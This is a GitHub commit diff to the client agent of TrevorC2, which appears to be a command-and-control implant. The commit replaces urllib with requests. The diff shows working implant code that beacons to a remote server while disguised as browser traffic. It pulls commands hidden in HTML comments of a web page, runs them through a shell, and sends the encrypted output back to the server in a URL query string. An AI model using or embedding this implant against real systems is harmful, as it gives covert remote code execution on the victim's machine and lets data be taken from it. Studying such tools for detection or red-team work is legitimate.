Skip to content

Commit

Permalink
Added requests support
Browse files Browse the repository at this point in the history
- Replaced urllib with requests
- Wrapped "stdout_value" in a "str" call to allow concatenation, because "Popen" returns a "bytes" object in Python 3.
  • Loading branch information
nasbench committed May 22, 2021
1 parent 1a39a2a commit 29706d8
Showing 1 changed file with 9 additions and 36 deletions.
45 changes: 9 additions & 36 deletions agents/trevorc2_client.py
Expand Up @@ -36,12 +36,8 @@


# python 2/3 compatibility, need to move this to python-requests in future
try:
import urllib2 as urllib
py = "2"
except:
import urllib.request, urllib.parse, urllib.error
py = "3"

import requests
import random
import base64
import time
Expand All @@ -51,7 +47,6 @@
from Crypto.Cipher import AES
import sys
import platform
import cookielib

# AES Support for Python2/3 - http://depado.markdownblog.com/2015-05-11-aes-cipher-with-python-3-x
class AESCipher(object):
Expand Down Expand Up @@ -90,6 +85,7 @@ def decrypt(self, enc):
return self._unpad(cipher.decrypt(enc[AES.block_size:])).decode('utf-8')



# establish cipher
cipher = AESCipher(key=CIPHER)

Expand All @@ -99,7 +95,7 @@ def random_interval(time_interval1, time_interval2):
return random.randint(time_interval1, time_interval2)

hostname = platform.node()
cookie = cookielib.CookieJar()
req = requests.session()

def connect_trevor():
    # we need to register our asset first
Expand All @@ -110,16 +106,8 @@ def connect_trevor():
hostname_send = base64.b64encode(hostname_send).decode('utf-8')

# pipe out stdout and base64 encode it then request via a query string parameter
if py == "3":
req = urllib.request.Request(SITE_URL + SITE_PATH_QUERY + "?" + QUERY_STRING + hostname_send, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko'})
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cookie))
html = urllib.request.urlopen(req).read()
break
else:
req = urllib.Request(SITE_URL + SITE_PATH_QUERY + "?" + QUERY_STRING + hostname_send, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko'})
opener = urllib.build_opener(urllib.HTTPCookieProcessor(cookie))
html = opener.open(req).read()
break
html = req.get(SITE_URL + SITE_PATH_QUERY + "?" + QUERY_STRING + hostname_send, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko'}).text
break

# handle exceptions and pass if the server is unavailable, but keep going
except Exception as error:
Expand All @@ -136,14 +124,7 @@ def connect_trevor():
try:
time.sleep(random_interval(time_interval1, time_interval2))
# request with specific user agent
if py == "3":
req = urllib.request.Request(SITE_URL + ROOT_PATH_QUERY, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko'})
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cookie))
html = urllib.request.urlopen(req).read().decode('utf-8')
else:
req = urllib.Request(SITE_URL + ROOT_PATH_QUERY, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko'})
opener = urllib.build_opener(urllib.HTTPCookieProcessor(cookie))
html = opener.open(req).read().decode('utf-8');
html = req.get(SITE_URL + ROOT_PATH_QUERY, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko'}).text

# <!-- PARAM=bm90aGluZw== --></body> - What we split on here on encoded site
parse = html.split("<!-- %s" % (STUB))[1].split("-->")[0]
Expand All @@ -155,19 +136,11 @@ def connect_trevor():
# execute our parsed command
proc = subprocess.Popen(parse, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout_value = proc.communicate()[0]
stdout_value = cipher.encrypt(hostname + "::::" + stdout_value).encode('utf-8')
stdout_value = cipher.encrypt(hostname + "::::" + str(stdout_value)).encode('utf-8')
stdout_value = base64.b64encode(stdout_value).decode('utf-8')

# pipe out stdout and base64 encode it then request via a query string parameter
if py == "3":
req = urllib.request.Request(SITE_URL + SITE_PATH_QUERY + "?" + QUERY_STRING + stdout_value, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko'})
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cookie))
html = urllib.request.urlopen(req).read()

else:
req = urllib.Request(SITE_URL + SITE_PATH_QUERY + "?" + QUERY_STRING + stdout_value, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko'})
opener = urllib.build_opener(urllib.HTTPCookieProcessor(cookie))
html = opener.open(req).read()
html = req.get(SITE_URL + SITE_PATH_QUERY + "?" + QUERY_STRING + stdout_value, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko'}).text

# sleep random interval and let cleanup on server side
time.sleep(random_interval(time_interval1, time_interval2))
Expand Down

0 comments on commit 29706d8

Please sign in to comment.